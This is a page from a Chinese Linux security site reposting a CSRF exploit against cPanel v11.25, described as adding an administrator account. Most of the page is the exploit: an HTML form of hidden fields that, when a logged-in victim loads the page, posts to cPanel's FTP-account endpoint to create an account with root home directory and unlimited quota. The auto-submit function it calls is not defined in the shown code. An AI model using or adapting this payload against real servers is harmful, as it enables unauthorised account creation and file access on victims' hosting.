Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

Cpanel v11.25 CSRF 添加管理员账号exp

来源: 未知 分享至:

Cpanel v11.25 CSRF 添加管理员账号漏洞。
Exploite:

<html>     <body onload="javascript:fireForms()">     <form method="POST" name="form0" action="     http://server:2082/frontend/x3/ftp/doaddftp.html">     <input type="hidden" name="login" value="name"/>     <input type="hidden" name="password" value="pass"/>     <input type="hidden" name="password2" value="pass"/>     <input type="hidden" name="homedir" value="/"/>     <input type="hidden" name="quota" value="unlimited"/>     </form>     </body>     </html>   


影响版本:V 11.25
官方地址:http://www.cpanel.net/


Tags: rewrite proxy_pass $host
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史